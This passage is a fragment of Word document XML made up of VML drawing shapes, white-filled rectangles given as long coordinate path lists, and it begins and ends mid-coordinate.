213,8233,2213,8233,2213,8233,2213,8233,2212,8233,2212,8233,2212,8233,2212,8233,2211,8233,2211,8233,2211,8233,2210,8233,2210,8233,2209,8233,2209,8233,2209,8233,2208,8233,2208,8233,2207,8233,2207,8233,2206,8233,2206,8233,2205,8233,2205,8233,2204,8233,2203,8233,2203,8233,2202,8233,2201,8233,2200,8233,2200,8233,2199,8233,2198,8233,2197,8233,2196,8233,2196,8233,2195,8233,2194,8233,2193,8233,2192,8233,2191,8233,2190,8233,2189,8233,2187,8233,2186,8233,2185,8233,2184,8233,2183,8233,2181,8233,2180,8233,2179,8233,2177,8233,2176,8233,2174,8233,2173,8233,2171,8233,2170,8233,2168,8233,2167,8233,2165,8233,2163,8233,2161,8233,2160,8233,2158,8233,2156,8233,2154,8233,2152,8233,2150,8233,2148,8233,2146,8233,2144,8233,2142,8233,2140,8233,2137,8233,2135,8233,2133,8233,2130,8233,2128,8233,2125,8233,2123,8233,2120,8233,2118,8233,2115,8233,2112,8233,2110,8233,2107,8233,2104,8233,2101,8233,2098,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8233,2095,8232,2095,8232,2095,8232,2095,8232,2095,8232,2095,8232,2095,8231,2095,8231,2095,8231,2095,8230,2095,8230,2095,8230,2095,8229,2095,8229,2095,8229,2095,8228,2095,8228,2095,8227,2095,8227,2095,8226,2095,8225,2095,8225,2095,8224,2095,8223,2095,8223,2095,8222,2095,8221,2095,8220,2095,8219,2095,8218,2095,8217,2095,8216,2095,8215,2095,8214,2095,8213,2095,8212,2095,8211,2095,8209,2095,8208,2095,8207,2095,8205,2095,8204,2095,8202,2095,8200,2095,8199,2095,8197,2095,8195,2095,8193,2095,8192,2095,8190,2095,8188,2095,8186,2095,8183,2095,8181,2095,8179,2095,8177,2095,8174,2095,8172,2095,8169,2095,8167,2095,8164,2095,8161,2095,8159,2095,8156,2095,8153,2095,8150,2095,8147,2095,8143,2095,8140,2095,8137,2095,8133,2095,8130,2095,8126,2095,8123,2095,8119,2095,8115,2095,8111,2095,8107,2095,8103,2095,8099,2095,8095,2095,8091,2095,8086,2095,8082,2095,8077,2095,8072,2095,8068,2095,8063,2095,8058,2095,8053,2095,8048,2095,8042,2095,8037,2095,8032,2095,8026,2095,8020,2095,8015,2095,8009,2095,8003,2095,7997,2095,7991,2095,7984,2095,7978e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:415.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,8310" coordsize="250,270">
        <v:shape style="position:absolute;left:1950;top:8310;width:250;height:270" coordorigin="1950,8310" coordsize="250,270" path="m1975,8338l1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1975,8338,1976,8338,1976,8338,1976,8338,1976,8338,1976,8338,1976,8338,1977,8338,1977,8338,1977,8338,1977,8338,1977,8338,1978,8338,1978,8338,1978,8338,1979,8338,1979,8338,1980,8338,1980,8338,1981,8338,1981,8338,1982,8338,1982,8338,1983,8338,1983,8338,1984,8338,1985,8338,1986,8338,1986,8338,1987,8338,1988,8338,1989,8338,1990,8338,1991,8338,1992,8338,1993,8338,1994,8338,1995,8338,1996,8338,1997,8338,1999,8338,2000,8338,2001,8338,2003,8338,2004,8338,2006,8338,2007,8338,2009,8338,2011,8338,2012,8338,2014,8338,2016,8338,2018,8338,2020,8338,2022,8338,2024,8338,2026,8338,2028,8338,2030,8338,2033,8338,2035,8338,2038,8338,2040,8338,2043,8338,2045,8338,2048,8338,2051,8338,2054,8338,2056,8338,2059,8338,2063,8338,2066,8338,2069,8338,2072,8338,2075,8338,2079,8338,2082,8338,2086,8338,2090,8338,2093,8338,2097,8338,2101,8338,2105,8338,2109,8338,2113,8338,2117,8338,2122,8338,2126,8338,2131,8338,2135,8338,2140,8338,2145,8338,2150,8338,2154,8338,2160,8338,2165,8338,2170,8338,2175,8338,2181,8338,2186,8338,2192,8338,2197,8338,2203,8338,2209,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8338,2215,8339,2215,8339,2215,8339,2215,8339,2215,8339,2215,8339,2215,8339,2215,8339,2215,8340,2215,8340,2215,8340,2215,8340,2215,8341,2215,8341,2215,8341,2215,8342,2215,8342,2215,8342,2215,8343,2215,8343,2215,8344,2215,8344,2215,8345,2215,8345,2215,8346,2215,8347,2215,8347,2215,8348,2215,8349,2215,8349,2215,8350,2215,8351,2215,8352,2215,8353,2215,8354,2215,8355,2215,8356,2215,8357,2215,8358,2215,8359,2215,8361,2215,8362,2215,8363,2215,8365,2215,8366,2215,8368,2215,8369,2215,8371,2215,8373,2215,8374,2215,8376,2215,8378,2215,8380,2215,8382,2215,8384,2215,8386,2215,8388,2215,8390,2215,8392,2215,8395,2215,8397,2215,8400,2215,8402,2215,8405,2215,8407,2215,8410,2215,8413,2215,8416,2215,8419,2215,8422,2215,8425,2215,8428,2215,8431,2215,8434,2215,8438,2215,8441,2215,8445,2215,8449,2215,8452,2215,8456,2215,8460,2215,8464,2215,8468,2215,8472,2215,8476,2215,8481,2215,8485,2215,8490,2215,8494,2215,8499,2215,8504,2215,8509,2215,8513,2215,8519,2215,8524,2215,8529,2215,8534,2215,8540,2215,8545,2215,8551,2215,8557,2215,8563,2215,8568,2215,8575,2215,8581,2215,8587,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2215,8593,2214,8593,2214,8593,2214,8593,2214,8593,2214,8593,2214,8593,2213,8593,2213,8593,2213,8593,2213,8593,2212,8593,2212,8593,2212,8593,2211,8593,2211,8593,2210,8593,2210,8593,2210,8593,2209,8593,2208,8593,2208,8593,2207,8593,2207,8593,2206,8593,2205,8593,2205,8593,2204,8593,2203,8593,2202,8593,2201,8593,2200,8593,2199,8593,2198,8593,2197,8593,2196,8593,2195,8593,2194,8593,2193,8593,2191,8593,2190,8593,2189,8593,2187,8593,2186,8593,2184,8593,2183,8593,2181,8593,2179,8593,2178,8593,2176,8593,2174,8593,2172,8593,2170,8593,2168,8593,2166,8593,2164,8593,2162,8593,2160,8593,2157,8593,2155,8593,2153,8593,2150,8593,2147,8593,2145,8593,2142,8593,2139,8593,2137,8593,2134,8593,2131,8593,2128,8593,2124,8593,2121,8593,2118,8593,2115,8593,2111,8593,2108,8593,2104,8593,2101,8593,2097,8593,2093,8593,2089,8593,2085,8593,2081,8593,2077,8593,2073,8593,2068,8593,2064,8593,2059,8593,2055,8593,2050,8593,2045,8593,2041,8593,2036,8593,2031,8593,2025,8593,2020,8593,2015,8593,2010,8593,2004,8593,1998,8593,1993,8593,1987,8593,1981,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8593,1975,8592,1975,8592,1975,8592,1975,8592,1975,8592,1975,8591,1975,8591,1975,8591,1975,8591,1975,8590,1975,8590,1975,8590,1975,8589,1975,8589,1975,8588,1975,8588,1975,8587,1975,8587,1975,8586,1975,8586,1975,8585,1975,8584,1975,8584,1975,8583,1975,8582,1975,8581,1975,8580,1975,8580,1975,8579,1975,8578,1975,8577,1975,8576,1975,8574,1975,8573,1975,8572,1975,8571,1975,8569,1975,8568,1975,8567,1975,8565,1975,8564,1975,8562,1975,8561,1975,8559,1975,8557,1975,8555,1975,8554,1975,8552,1975,8550,1975,8548,1975,8546,1975,8544,1975,8541,1975,8539,1975,8537,1975,8534,1975,8532,1975,8529,1975,8527,1975,8524,1975,8521,1975,8519,1975,8516,1975,8513,1975,8510,1975,8507,1975,8504,1975,8500,1975,8497,1975,8494,1975,8490,1975,8487,1975,8483,1975,8479,1975,8475,1975,8472,1975,8468,1975,8464,1975,8459,1975,8455,1975,8451,1975,8446,1975,8442,1975,8437,1975,8433,1975,8428,1975,8423,1975,8418,1975,8413,1975,8408,1975,8403,1975,8397,1975,8392,1975,8386,1975,8381,1975,8375,1975,8369,1975,8363,1975,8357,1975,8351,1975,8345,1975,8338e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:434.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,8690" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:8690;width:130;height:270" coordorigin="1950,8690" coordsize="130,270" path="m1975,8713l1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1976,8713,1976,8713,1976,8713,1976,8713,1976,8713,1976,8713,1976,8713,1976,8713,1977,8713,1977,8713,1977,8713,1977,8713,1977,8713,1978,8713,1978,8713,1978,8713,1978,8713,1979,8713,1979,8713,1979,8713,1980,8713,1980,8713,1980,8713,1981,8713,1981,8713,1981,8713,1982,8713,1982,8713,1983,8713,1983,8713,1984,8713,1984,8713,1985,8713,1986,8713,1986,8713,1987,8713,1988,8713,1988,8713,1989,8713,1990,8713,1990,8713,1991,8713,1992,8713,1993,8713,1994,8713,1995,8713,1995,8713,1996,8713,1997,8713,1998,8713,1999,8713,2000,8713,2002,8713,2003,8713,2004,8713,2005,8713,2006,8713,2008,8713,2009,8713,2010,8713,2011,8713,2013,8713,2014,8713,2016,8713,2017,8713,2019,8713,2020,8713,2022,8713,2024,8713,2025,8713,2027,8713,2029,8713,2030,8713,2032,8713,2034,8713,2036,8713,2038,8713,2040,8713,2042,8713,2044,8713,2046,8713,2048,8713,2051,8713,2053,8713,2055,8713,2057,8713,2060,8713,2062,8713,2065,8713,2067,8713,2070,8713,2072,8713,2075,8713,2078,8713,2081,8713,2083,8713,2086,8713,2089,8713,2092,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8714,2095,8714,2095,8714,2095,8714,2095,8714,2095,8714,2095,8714,2095,8714,2095,8714,2095,8714,2095,8715,2095,8715,2095,8715,2095,8715,2095,8715,2095,8716,2095,8716,2095,8716,2095,8717,2095,8717,2095,8717,2095,8718,2095,8718,2095,8719,2095,8719,2095,8720,2095,8720,2095,8721,2095,8722,2095,8722,2095,8723,2095,8724,2095,8725,2095,8725,2095,8726,2095,8727,2095,8728,2095,8729,2095,8730,2095,8731,2095,8732,2095,8733,2095,8735,2095,8736,2095,8737,2095,8739,2095,8740,2095,8741,2095,8743,2095,8744,2095,8746,2095,8748,2095,8749,2095,8751,2095,8753,2095,8755,2095,8757,2095,8759,2095,8761,2095,8763,2095,8765,2095,8768,2095,8770,2095,8772,2095,8775,2095,8777,2095,8780,2095,8783,2095,8785,2095,8788,2095,8791,2095,8794,2095,8797,2095,8800,2095,8803,2095,8806,2095,8810,2095,8813,2095,8817,2095,8820,2095,8824,2095,8827,2095,8831,2095,8835,2095,8839,2095,8843,2095,8847,2095,8852,2095,8856,2095,8860,2095,8865,2095,8869,2095,8874,2095,8879,2095,8884,2095,8889,2095,8894,2095,8899,2095,8904,2095,8909,2095,8915,2095,8920,2095,8926,2095,8932,2095,8938,2095,8944,2095,8950,2095,8956,2095,8962,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2094,8969,2094,8969,2094,8969,2094,8969,2094,8969,2094,8969,2094,8969,2094,8969,2093,8969,2093,8969,2093,8969,2093,8969,2093,8969,2092,8969,2092,8969,2092,8969,2092,8969,2091,8969,2091,8969,2091,8969,2090,8969,2090,8969,2090,8969,2089,8969,2089,8969,2089,8969,2088,8969,2088,8969,2087,8969,2087,8969,2086,8969,2086,8969,2085,8969,2084,8969,2084,8969,2083,8969,2083,8969,2082,8969,2081,8969,2080,8969,2080,8969,2079,8969,2078,8969,2077,8969,2076,8969,2075,8969,2075,8969,2074,8969,2073,8969,2072,8969,2071,8969,2070,8969,2068,8969,2067,8969,2066,8969,2065,8969,2064,8969,2063,8969,2061,8969,2060,8969,2059,8969,2057,8969,2056,8969,2054,8969,2053,8969,2051,8969,2050,8969,2048,8969,2047,8969,2045,8969,2043,8969,2041,8969,2040,8969,2038,8969,2036,8969,2034,8969,2032,8969,2030,8969,2028,8969,2026,8969,2024,8969,2022,8969,2019,8969,2017,8969,2015,8969,2013,8969,2010,8969,2008,8969,2005,8969,2003,8969,2000,8969,1998,8969,1995,8969,1992,8969,1990,8969,1987,8969,1984,8969,1981,8969,1978,8969,1975,8969,1975,8969,1975,8969,1975,8969,1975,8969,1975,8969,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8968,1975,8967,1975,8967,1975,8967,1975,8967,1975,8967,1975,8966,1975,8966,1975,8966,1975,8966,1975,8965,1975,8965,1975,8964,1975,8964,1975,8964,1975,8963,1975,8963,1975,8962,1975,8961,1975,8961,1975,8960,1975,8960,1975,8959,1975,8958,1975,8957,1975,8956,1975,8956,1975,8955,1975,8954,1975,8953,1975,8952,1975,8951,1975,8950,1975,8948,1975,8947,1975,8946,1975,8945,1975,8943,1975,8942,1975,8940,1975,8939,1975,8937,1975,8936,1975,8934,1975,8932,1975,8931,1975,8929,1975,8927,1975,8925,1975,8923,1975,8921,1975,8919,1975,8917,1975,8914,1975,8912,1975,8910,1975,8907,1975,8905,1975,8902,1975,8899,1975,8897,1975,8894,1975,8891,1975,8888,1975,8885,1975,8882,1975,8879,1975,8876,1975,8872,1975,8869,1975,8865,1975,8862,1975,8858,1975,8854,1975,8851,1975,8847,1975,8843,1975,8839,1975,8835,1975,8830,1975,8826,1975,8822,1975,8817,1975,8813,1975,8808,1975,8803,1975,8798,1975,8793,1975,8788,1975,8783,1975,8778,1975,8772,1975,8767,1975,8761,1975,8756,1975,8750,1975,8744,1975,8738,1975,8732,1975,8726,1975,8720,1975,8713e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:434.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,8690" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:8690;width:130;height:270" coordorigin="2070,8690" coordsize="130,270" path="m2095,8713l2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2096,8713,2096,8713,2096,8713,2096,8713,2096,8713,2096,8713,2096,8713,2096,8713,2096,8713,2097,8713,2097,8713,2097,8713,2097,8713,2097,8713,2098,8713,2098,8713,2098,8713,2098,8713,2099,8713,2099,8713,2099,8713,2100,8713,2100,8713,2100,8713,2101,8713,2101,8713,2102,8713,2102,8713,2102,8713,2103,8713,2103,8713,2104,8713,2105,8713,2105,8713,2106,8713,2106,8713,2107,8713,2108,8713,2108,8713,2109,8713,2110,8713,2110,8713,2111,8713,2112,8713,2113,8713,2114,8713,2115,8713,2116,8713,2116,8713,2117,8713,2118,8713,2119,8713,2121,8713,2122,8713,2123,8713,2124,8713,2125,8713,2126,8713,2128,8713,2129,8713,2130,8713,2132,8713,2133,8713,2134,8713,2136,8713,2137,8713,2139,8713,2140,8713,2142,8713,2144,8713,2145,8713,2147,8713,2149,8713,2151,8713,2152,8713,2154,8713,2156,8713,2158,8713,2160,8713,2162,8713,2164,8713,2166,8713,2168,8713,2171,8713,2173,8713,2175,8713,2178,8713,2180,8713,2182,8713,2185,8713,2187,8713,2190,8713,2192,8713,2195,8713,2198,8713,2201,8713,2203,8713,2206,8713,2209,8713,2212,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8714,2215,8714,2215,8714,2215,8714,2215,8714,2215,8714,2215,8714,2215,8714,2215,8714,2215,8714,2215,8715,2215,8715,2215,8715,2215,8715,2215,8715,2215,8716,2215,8716,2215,8716,2215,8717,2215,8717,2215,8717,2215,8718,2215,8718,2215,8719,2215,8719,2215,8720,2215,8720,2215,8721,2215,8722,2215,8722,2215,8723,2215,8724,2215,8725,2215,8725,2215,8726,2215,8727,2215,8728,2215,8729,2215,8730,2215,8731,2215,8732,2215,8733,2215,8735,2215,8736,2215,8737,2215,8739,2215,8740,2215,8741,2215,8743,2215,8744,2215,8746,2215,8748,2215,8749,2215,8751,2215,8753,2215,8755,2215,8757,2215,8759,2215,8761,2215,8763,2215,8765,2215,8768,2215,8770,2215,8772,2215,8775,2215,8777,2215,8780,2215,8783,2215,8785,2215,8788,2215,8791,2215,8794,2215,8797,2215,8800,2215,8803,2215,8806,2215,8810,2215,8813,2215,8817,2215,8820,2215,8824,2215,8827,2215,8831,2215,8835,2215,8839,2215,8843,2215,8847,2215,8852,2215,8856,2215,8860,2215,8865,2215,8869,2215,8874,2215,8879,2215,8884,2215,8889,2215,8894,2215,8899,2215,8904,2215,8909,2215,8915,2215,8920,2215,8926,2215,8932,2215,8938,2215,8944,2215,8950,2215,8956,2215,8962,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2215,8969,2214,8969,2214,8969,2214,8969,2214,8969,2214,8969,2214,8969,2214,8969,2214,8969,2213,8969,2213,8969,2213,8969,2213,8969,2213,8969,2212,8969,2212,8969,2212,8969,2212,8969,2211,8969,2211,8969,2211,8969,2210,8969,2210,8969,2209,8969,2209,8969,2209,8969,2208,8969,2208,8969,2207,8969,2207,8969,2206,8969,2206,8969,2205,8969,2205,8969,2204,8969,2203,8969,2203,8969,2202,8969,2201,8969,2200,8969,2200,8969,2199,8969,2198,8969,2197,8969,2196,8969,2196,8969,2195,8969,2194,8969,2193,8969,2192,8969,2191,8969,2190,8969,2189,8969,2187,8969,2186,8969,2185,8969,2184,8969,2183,8969,2181,8969,2180,8969,2179,8969,2177,8969,2176,8969,2174,8969,2173,8969,2171,8969,2170,8969,2168,8969,2167,8969,2165,8969,2163,8969,2161,8969,2160,8969,2158,8969,2156,8969,2154,8969,2152,8969,2150,8969,2148,8969,2146,8969,2144,8969,2142,8969,2140,8969,2137,8969,2135,8969,2133,8969,2130,8969,2128,8969,2125,8969,2123,8969,2120,8969,2118,8969,2115,8969,2112,8969,2110,8969,2107,8969,2104,8969,2101,8969,2098,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8969,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8968,2095,8967,2095,8967,2095,8967,2095,8967,2095,8967,2095,8966,2095,8966,2095,8966,2095,8966,2095,8965,2095,8965,2095,8964,2095,8964,2095,8964,2095,8963,2095,8963,2095,8962,2095,8961,2095,8961,2095,8960,2095,8960,2095,8959,2095,8958,2095,8957,2095,8956,2095,8956,2095,8955,2095,8954,2095,8953,2095,8952,2095,8951,2095,8950,2095,8948,2095,8947,2095,8946,2095,8945,2095,8943,2095,8942,2095,8940,2095,8939,2095,8937,2095,8936,2095,8934,2095,8932,2095,8931,2095,8929,2095,8927,2095,8925,2095,8923,2095,8921,2095,8919,2095,8917,2095,8914,2095,8912,2095,8910,2095,8907,2095,8905,2095,8902,2095,8899,2095,8897,2095,8894,2095,8891,2095,8888,2095,8885,2095,8882,2095,8879,2095,8876,2095,8872,2095,8869,2095,8865,2095,8862,2095,8858,2095,8854,2095,8851,2095,8847,2095,8843,2095,8839,2095,8835,2095,8830,2095,8826,2095,8822,2095,8817,2095,8813,2095,8808,2095,8803,2095,8798,2095,8793,2095,8788,2095,8783,2095,8778,2095,8772,2095,8767,2095,8761,2095,8756,2095,8750,2095,8744,2095,8738,2095,8732,2095,8726,2095,8720,2095,8713e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:572.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,11450" coordsize="130,250">
        <v:shape style="position:absolute;left:1950;top:11450;width:130;height:250" coordorigin="1950,11450" coordsize="130,250" path="m1975,11460l1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1975,11460,1976,11460,1976,11460,1976,11460,1976,11460,1976,11460,1976,11460,1976,11460,1976,11460,1977,11460,1977,11460,1977,11460,1977,11460,1977,11460,1978,11460,1978,11460,1978,11460,1978,11460,1979,11460,1979,11460,1979,11460,1980,11460,1980,11460,1980,11460,1981,11460,1981,11460,1981,11460,1982,11460,1982,11460,1983,11460,1983,11460,1984,11460,1984,11460,1985,11460,1986,11460,1986,11460,1987,11460,1988,11460,1988,11460,1989,11460,1990,11460,1990,11460,1991,11460,1992,11460,1993,11460,1994,11460,1995,11460,1995,11460,1996,11460,1997,11460,1998,11460,1999,11460,2000,11460,2002,11460,2003,11460,2004,11460,2005,11460,2006,11460,2008,11460,2009,11460,2010,11460,2011,11460,2013,11460,2014,11460,2016,11460,2017,11460,2019,11460,2020,11460,2022,11460,2024,11460,2025,11460,2027,11460,2029,11460,2030,11460,2032,11460,2034,11460,2036,11460,2038,11460,2040,11460,2042,11460,2044,11460,2046,11460,2048,11460,2051,11460,2053,11460,2055,11460,2057,11460,2060,11460,2062,11460,2065,11460,2067,11460,2070,11460,2072,11460,2075,11460,2078,11460,2081,11460,2083,11460,2086,11460,2089,11460,2092,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11461,2095,11461,2095,11461,2095,11461,2095,11461,2095,11461,2095,11462,2095,11462,2095,11462,2095,11462,2095,11463,2095,11463,2095,11463,2095,11464,2095,11464,2095,11465,2095,11465,2095,11466,2095,11466,2095,11467,2095,11467,2095,11468,2095,11469,2095,11469,2095,11470,2095,11471,2095,11472,2095,11473,2095,11474,2095,11475,2095,11475,2095,11477,2095,11478,2095,11479,2095,11480,2095,11481,2095,11482,2095,11484,2095,11485,2095,11486,2095,11488,2095,11489,2095,11491,2095,11492,2095,11494,2095,11496,2095,11498,2095,11499,2095,11501,2095,11503,2095,11505,2095,11507,2095,11510,2095,11512,2095,11514,2095,11516,2095,11519,2095,11521,2095,11524,2095,11526,2095,11529,2095,11532,2095,11534,2095,11537,2095,11540,2095,11543,2095,11546,2095,11550,2095,11553,2095,11556,2095,11559,2095,11563,2095,11567,2095,11570,2095,11574,2095,11578,2095,11582,2095,11586,2095,11590,2095,11594,2095,11598,2095,11602,2095,11607,2095,11611,2095,11616,2095,11620,2095,11625,2095,11630,2095,11635,2095,11640,2095,11645,2095,11650,2095,11656,2095,11661,2095,11667,2095,11672,2095,11678,2095,11684,2095,11690,2095,11696,2095,11702,2095,11709,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2094,11715,2094,11715,2094,11715,2094,11715,2094,11715,2094,11715,2094,11715,2094,11715,2093,11715,2093,11715,2093,11715,2093,11715,2093,11715,2092,11715,2092,11715,2092,11715,2092,11715,2091,11715,2091,11715,2091,11715,2090,11715,2090,11715,2090,11715,2089,11715,2089,11715,2089,11715,2088,11715,2088,11715,2087,11715,2087,11715,2086,11715,2086,11715,2085,11715,2084,11715,2084,11715,2083,11715,2083,11715,2082,11715,2081,11715,2080,11715,2080,11715,2079,11715,2078,11715,2077,11715,2076,11715,2075,11715,2075,11715,2074,11715,2073,11715,2072,11715,2071,11715,2070,11715,2068,11715,2067,11715,2066,11715,2065,11715,2064,11715,2063,11715,2061,11715,2060,11715,2059,11715,2057,11715,2056,11715,2054,11715,2053,11715,2051,11715,2050,11715,2048,11715,2047,11715,2045,11715,2043,11715,2041,11715,2040,11715,2038,11715,2036,11715,2034,11715,2032,11715,2030,11715,2028,11715,2026,11715,2024,11715,2022,11715,2019,11715,2017,11715,2015,11715,2013,11715,2010,11715,2008,11715,2005,11715,2003,11715,2000,11715,1998,11715,1995,11715,1992,11715,1990,11715,1987,11715,1984,11715,1981,11715,1978,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11715,1975,11714,1975,11714,1975,11714,1975,11714,1975,11714,1975,11714,1975,11714,1975,11714,1975,11713,1975,11713,1975,11713,1975,11713,1975,11712,1975,11712,1975,11712,1975,11711,1975,11711,1975,11710,1975,11710,1975,11709,1975,11709,1975,11708,1975,11708,1975,11707,1975,11707,1975,11706,1975,11705,1975,11704,1975,11704,1975,11703,1975,11702,1975,11701,1975,11700,1975,11699,1975,11698,1975,11697,1975,11696,1975,11695,1975,11694,1975,11692,1975,11691,1975,11690,1975,11688,1975,11687,1975,11685,1975,11684,1975,11682,1975,11681,1975,11679,1975,11677,1975,11675,1975,11673,1975,11671,1975,11669,1975,11667,1975,11665,1975,11663,1975,11661,1975,11658,1975,11656,1975,11654,1975,11651,1975,11648,1975,11646,1975,11643,1975,11640,1975,11637,1975,11634,1975,11631,1975,11628,1975,11625,1975,11622,1975,11619,1975,11615,1975,11612,1975,11608,1975,11605,1975,11601,1975,11597,1975,11593,1975,11589,1975,11585,1975,11581,1975,11577,1975,11572,1975,11568,1975,11564,1975,11559,1975,11554,1975,11549,1975,11545,1975,11540,1975,11535,1975,11529,1975,11524,1975,11519,1975,11513,1975,11508,1975,11502,1975,11496,1975,11491,1975,11485,1975,11479,1975,11472,1975,11466,1975,11460e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:572.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,11450" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:11450;width:130;height:250" coordorigin="2070,11450" coordsize="130,250" path="m2095,11460l2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2097,11460,2097,11460,2097,11460,2097,11460,2097,11460,2098,11460,2098,11460,2098,11460,2098,11460,2099,11460,2099,11460,2099,11460,2100,11460,2100,11460,2100,11460,2101,11460,2101,11460,2102,11460,2102,11460,2102,11460,2103,11460,2103,11460,2104,11460,2105,11460,2105,11460,2106,11460,2106,11460,2107,11460,2108,11460,2108,11460,2109,11460,2110,11460,2110,11460,2111,11460,2112,11460,2113,11460,2114,11460,2115,11460,2116,11460,2116,11460,2117,11460,2118,11460,2119,11460,2121,11460,2122,11460,2123,11460,2124,11460,2125,11460,2126,11460,2128,11460,2129,11460,2130,11460,2132,11460,2133,11460,2134,11460,2136,11460,2137,11460,2139,11460,2140,11460,2142,11460,2144,11460,2145,11460,2147,11460,2149,11460,2151,11460,2152,11460,2154,11460,2156,11460,2158,11460,2160,11460,2162,11460,2164,11460,2166,11460,2168,11460,2171,11460,2173,11460,2175,11460,2178,11460,2180,11460,2182,11460,2185,11460,2187,11460,2190,11460,2192,11460,2195,11460,2198,11460,2201,11460,2203,11460,2206,11460,2209,11460,2212,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11461,2215,11461,2215,11461,2215,11461,2215,11461,2215,11461,2215,11462,2215,11462,2215,11462,2215,11462,2215,11463,2215,11463,2215,11463,2215,11464,2215,11464,2215,11465,2215,11465,2215,11466,2215,11466,2215,11467,2215,11467,2215,11468,2215,11469,2215,11469,2215,11470,2215,11471,2215,11472,2215,11473,2215,11474,2215,11475,2215,11475,2215,11477,2215,11478,2215,11479,2215,1148